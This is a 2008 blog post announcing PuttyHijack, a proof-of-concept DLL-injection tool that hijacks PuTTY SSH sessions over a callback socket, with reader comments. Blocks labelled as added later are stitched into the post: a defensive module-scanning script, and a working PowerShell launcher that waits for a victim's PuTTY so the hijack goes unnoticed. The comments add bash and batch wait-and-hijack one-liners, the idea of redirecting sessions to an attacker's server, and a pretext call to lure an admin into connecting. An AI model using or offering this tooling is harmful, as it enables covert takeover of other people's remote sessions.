Monday, August 4, 2008

Putty Hijack released by Insomnia Security

Brett Moore of Insomnia Security has released Putty Hijack


From the announcement:

PuttyHijack is a POC tool that injects a dll into the Putty
process to hijack an existing, or soon to be created, connection.

This can be useful during penetration tests when a windows box that
has been compromised is used to SSH/Telnet into other servers.

The injected DLL installs some hooks and creates a socket for a
callback connection that is then used for input/output redirection.

It does not kill the current connection, and will cleanly uninject
if the socket or process is stopped.
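The mechanism the announcement describes, a DLL injected into the PuTTY process that installs hooks and opens a callback socket, is also the defender's handle on it: the injected DLL shows up as a module loaded into putty.exe that does not belong there. The following PowerShell is an added example for the defensive side, not code from the post or from Insomnia Security's tool. It lists the modules loaded into every running putty.exe and flags those that live outside %SystemRoot% and outside putty.exe's own folder. The function name and the trusted-root rule are assumptions of this example.

```powershell
# Added example (not from the post or from PuttyHijack): flag DLLs loaded into
# putty.exe that do not live under %SystemRoot% or beside putty.exe itself.
# Assumes Windows PowerShell 3.0+ and the right to read the target's module
# list (run elevated, with the same bitness as putty.exe, if this errors).

function Get-UnexpectedPuttyModules {
    # %SystemRoot% (e.g. C:\Windows) covers System32, SysWOW64 and WinSxS.
    $trustedRoots = @($env:SystemRoot)

    foreach ($proc in Get-Process -Name putty -ErrorAction SilentlyContinue) {
        $roots = $trustedRoots
        # DLLs sitting next to putty.exe are expected; anything else is not.
        if ($proc.Path) { $roots += Split-Path -Parent $proc.Path }

        foreach ($mod in $proc.Modules) {
            $dir = Split-Path -Parent $mod.FileName
            $known = $false
            foreach ($root in $roots) {
                if ($dir.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) {
                    $known = $true
                    break
                }
            }
            if (-not $known) {
                [pscustomobject]@{
                    PID     = $proc.Id
                    Module  = $mod.ModuleName
                    Path    = $mod.FileName
                    Company = $mod.FileVersionInfo.CompanyName
                }
            }
        }
    }
}

Get-UnexpectedPuttyModules | Format-Table -AutoSize
```

Treat the output as a triage list rather than a verdict: antivirus shims, input-method editors and shell extensions legitimately load from Program Files, so compare against a baseline taken from a known-clean host. A DLL with no company name, loaded from a temp or user-profile directory, is the pattern to chase.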

The tool works as described in the announcement.

* Only works if putty is already running; otherwise it has nothing to hook. So in its current state it's cute but not usable.
* What would be handy would be for the tool to run and wait for putty to start, then do the hooking.
* The low-tech solution of just replacing the putty link with a .bat file calling both putty.exe and puttyhijack is thus far not working :-(
* Source is included, so realistically I should shut up and just fire up Visual Studio.
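The missing piece the notes above ask for is a launcher that blocks until a putty.exe exists and only then runs the hijack tool, without the attacker starting PuTTY and tipping off the user. The following PowerShell is an added example, not code from PuttyHijack or from the post. It uses an already-running putty.exe if there is one (the case the tool handles today) and otherwise waits on a WMI process-creation event instead of polling in a loop. The path in $ToolPath and the assumption that PuttyHijack.exe takes the callback port as its only argument (the way the commenters on this post invoke it) are assumptions of this example; check the tool's own usage text.

```powershell
# Added example, not code from PuttyHijack or from the post. Waits for a
# putty.exe to exist (reusing a running one, or blocking on a WMI process
# creation event until one starts), then launches the hijack tool.
# Assumptions (hypothetical, verify against the tool's README): PuttyHijack.exe
# is at $ToolPath and takes the callback port as its only argument, as the
# commenters on this post invoke it. Requires Windows PowerShell 2.0+.

param(
    [string]$ToolPath = 'C:\tools\PuttyHijack.exe',   # assumed location
    [int]$Port = 2222                                  # assumed callback port
)

function Wait-PuttyProcess {
    # Return the PID of a running putty.exe, waiting for one if necessary.
    $existing = Get-Process -Name putty -ErrorAction SilentlyContinue | Select-Object -First 1
    if ($existing) { return $existing.Id }

    # Intrinsic WQL event: WMI checks Win32_Process every second and raises an
    # event for each new instance named putty.exe. No admin rights required.
    $query = "SELECT * FROM __InstanceCreationEvent WITHIN 1 " +
             "WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'putty.exe'"
    $watcher = New-Object System.Management.ManagementEventWatcher $query
    try {
        $evt = $watcher.WaitForNextEvent()    # blocks until putty.exe starts
        return [int]$evt.TargetInstance.ProcessId
    }
    finally {
        $watcher.Stop()
        $watcher.Dispose()
    }
}

$puttyPid = Wait-PuttyProcess
Write-Host "putty.exe is running as PID $puttyPid; starting hijack with callback port $Port"
& $ToolPath $Port
```

Because the event fires as soon as the process object exists, the hook is in place before the user has typed a hostname, which is the "soon to be created connection" case from the announcement. WITHIN 1 sets the WMI polling interval in seconds; a larger value costs less CPU but can miss a PuTTY that is opened and closed quickly.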

Screen shots (images not reproduced here)
Anonymous said...

I'm sure a short shell script would work to check the status of PuTTY and wait for it to be launched. That way you wouldn't alert the user/victim by kicking off a PuTTY session without them asking. You can just run the script, sit back and wait ;)

Something like this maybe .:

# Re-evaluate the process check on every pass (the original assigned it once and then tested an unset $result, so the loop never exited or never started).
while [ "$(ps -ea | grep -i putty | grep -v grep | wc -l)" -eq 0 ]; do echo "PuTTY not running. Waiting 10 seconds before recheck"; sleep 10; done; PuttyHijack 2222

Quick and dirty I know... but could be interesting.

CG said...

Good idea, but it's Windows only.

Anonymous said...

Yeah I realized this after I clicked to post the comment. Sometimes lack of sleep can make you do crazy things. Maybe this one might be more the ticket .:

FOR /L %i in (1,0,2) do @wmic process list brief | findstr "putty.exe" && c:\pathto\PuttyHijack 2222 && exit

Morgan Storey said...

Couldn't you have a 7zip executable that is set to extract putty.exe, process.exe, the dll and puttyhijack.exe, then run putty, process.exe (to get the pid), then call puttyhijack with the pid passed through and a redirect to the attacker's server?

CG said...

Perhaps, but then you'd have to wait for the admin to log into the already existing putty instance. They may be suspicious of that.

Of course, doing that and then calling them about a problem that they might SSH into the router/server to fix....